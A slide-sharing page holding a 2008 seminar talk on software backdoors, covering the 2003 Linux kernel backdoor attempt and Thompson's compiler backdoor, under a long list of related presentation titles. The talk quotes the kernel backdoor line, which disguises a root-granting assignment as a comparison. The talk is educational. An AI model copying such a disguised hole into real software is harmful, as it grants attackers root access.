BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen.

Slides:

Advertisements

Similar presentations

Trap Doors & Logic Bombs William Dotson. Overview Malware Taxonomy Definitions Historical Overview Protection Methods Ethical Issues.

Advertisements

Understand Database Security Concepts

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.

Reflections on Trusting Trust Ken Thompson. Communication of the ACM, Vol. 27, No. 8, August 1984, pp Copyright 1984, Association for Computing.

Dan Boneh CS155 Computer Security Looking for undergrad research? Come see me!

Computer Security Dan Boneh and David Mazieres CS 155 Spring 2007

What are Trojan horses?  A Trojan horse is full of as much trickery as the mythological Trojan horse it was named after. The Trojan horse, at first glance.

Trusting the Trust Budi Rahardjo Inixindo Security Day Seminar The Executive Club, Jakarta, 19 March 2009.

Security: Attacks. 2 Trojan Horse Malicious program disguised as an innocent one –Could modify/delete user’s file, send important info to cracker, etc.

Chapter 4 Application Security Knowledge and Test Prep

Security Comparisons of Open Source and Closed Source Programs Katherine Wright.

Norman SecureSurf Protect your users when surfing the Internet.

1 Introduction to Tool chains. 2 Tool chain for the Sitara Family (but it is true for other ARM based devices as well) A tool chain is a collection of.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

Lecture 18 Page 1 CS 111 Online Design Principles for Secure Systems Economy Complete mediation Open design Separation of privileges Least privilege Least.

UNIT 4 ASSIGNMENT VIRUSES & DESTRUCTIVE PROGRAMS.

VeribisCRM CUSTOMER RELATIONSHIP MANAGEMENT Engin Duran Experience is our know how.

Information Security Rabie A. Ramadan GUC, Cairo Room C Lecture 2.

Home Media Network Hard Drive Training for Update to 2.0 By Erik Collett Revised for Firmware Update.

Viruses & Destructive Programs

ANDROID Presented By Mastan Vali.SK. © artesis 2008 | 2 1. Introduction 2. Platform 3. Software development 4. Advantages Main topics.

CIS 450 – Network Security Chapter 16 – Covering the Tracks.

Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.

1.2 Security. Computer security is a branch of technology known as information security, it is applied to computers and networks. It is used to protect.

1 Figure 4-16: Malicious Software (Malware) Malware: Malicious software Essentially an automated attack robot capable of doing much damage Usually target-of-opportunity.

For any query mail to or BITS Pilani Lecture # 1.

 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.

Chapter 7 File I/O 1. File, Record & Field 2 The file is just a chunk of disk space set aside for data and given a name. The computer has no idea what.

Computer Network Forensics Lecture 6 – Intrusion Detection © Joe Cleetus Concurrent Engineering Research Center, Lane Dept of Computer Science and Engineering,

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Lecture 19 Page 1 CS 236 Online 16. Account Monitoring and Control Why it’s important: –Inactive accounts are often attacker’s path into your system –Nobody’s.

Cryptography and Network Security (CS435) Part One (Introduction)

SQL Injection Jason Dunn. SQL Overview Structured Query Language For use with Databases Purpose is to retrieve information Main Statements Select Insert.

By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.

Security CS Introduction to Operating Systems.

Windows Operating System Internals - by David A. Solomon and Mark E. Russinovich with Andreas Polze Unit OS7: Security 7.1. The Security Problem.

1.Nattawut Chaibuuranapankul M.2/6 No. 8 2.Poonnut Sovanpaiboon M.2/6 No.11 3.Sarin Jirasinvimol M.2/6 No Attadej Rujirawannakun M.2/6 No.28.

Unit 9: Distributing Computing & Networking Kaplan University 1.

Malicious Software.

Computer virus Speaker : 蔡尚倫.  Introduction  Infection target  Infection techniques Outline.

CIT 380: Securing Computer Systems Security Solutions Part 2.

GCSE ICT By the end of this session, you will be able to:  Understand concept of a Windows operating system and have a basic understanding of GUI.

Course Introduction David Ferry, Chris Gill Department of Computer Science and Engineering Washington University, St. Louis MO 1E81.

NETWORK SECURITY Definitions and Preventions Toby Wilson.

Lecture 3 Page 1 CS 236 Online Security Mechanisms CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.

LINUX Presented By Parvathy Subramanian. April 23, 2008LINUX, By Parvathy Subramanian2 Agenda ► Introduction ► Standard design for security systems ►

Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,

Lecture 4 Page 1 CS 111 Online Modularity and Memory Clearly, programs must have access to memory We need abstractions that give them the required access.

OPS224 Operating Systems - Unix Instructor: MURRAY SAUL.

Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.

BareDroid Presenter: Callan Christophersen. What is BareDroid BareDroid is a system to analyse Android apps on real devices with no emulation. It uses.

Insecure PCs virus malware phishing spam spyware botnets DNS spoofing identity theft Trojan horse buffer overflow DoS attack worm keyloggers cross-site.

JavaScript Part 1 Introduction to scripting The ‘alert’ function.

Mark Ryan Professor of Computer Security 25 November 2009

Topic 2: Hardware and Software

Port Knocking Benjamin DiYanni.

links and attachments: Help stop malware from spreading

Backdoor Attacks.

Testing and Debugging.

SQL Injection Attacks Many web servers have backing databases

Day 01 Introduction to Linux and C

Ubuntu Working in Terminal

Rootkit A rootkit is a set of tools which take the ability to access a computer or computer network at administrator level. Generally, hackers install.

Chap 10 Malicious Software.

Executive Director and Endowed Chair

Executive Director and Endowed Chair

Chap 10 Malicious Software.

CS-3013 Operating Systems Hugh C. Lauer

Reflections on Trusting Trust by Ken Thomson

Presentation transcript:

BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen

Definition and Introduction unwanted software mechanism introduced into part of the system to provide an easy access attacker has created the mechanism earlier and wants to use it sometime later mechanism can be injected from outside: malware send through network on-site: hard coded into software two examples of actual backdoors

Backdoor Attempt in Linux Kernel happened in November 2003 change in a kernel source file kernel/exit.c person noticing this first focused on the annoyance of using manual modification peers queried more about the change

Backdoor Attempt in Linux Kernel following piece of code was added: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; effectively this means that with flags __WCLONE and __WALL on current user gets root permissions lax review might think the latter as an evaluation of condition instead of assignment extra parenthesis avoid compile warnings

Backdoor Attempt in Linux Kernel the attempt came to daylight because the file in question was under automatic control of modifications fellow developers were active enough to ask about the changes

Backdoors in Compilers introduced by Ken Thompson in 1984 prerequisite concepts for compiler backdoor self-replicating program program outputs its own source code also known as quine

Backdoors in Compilers prerequisite concepts for compiler backdoor self-replicating program program outputs its own source code also known as quine training programs adding new feature to program e.g. to recognize new escaped symbol

Backdoors in Compilers phases of injecting backdoor into compiler add backdoor to compiler source code to compile backdoor in login command add another backdoor to compiler source code to insert this as self-replicating code and login backdoor to compiler source code

Backdoors in Compilers backdoor was tested on friendly victim disassembler was also rigged to fail the diassembling of object code

Sources Jeremy. Linux: Kernel “Back Door” Attempt. Poulsen. Thwarted Linux backdoor hints at smarter hackers. Thompson, Reflections on Trusting Trust. Communications of the ACM. Vol. 27, Issue 8 (Aug. 1984), pages Skoudis & Zeltser. Malware: Fighting Malicious Code. Schneier. Countering "Trusting Trust". Zhang & Paxson. Detecting Backdoors.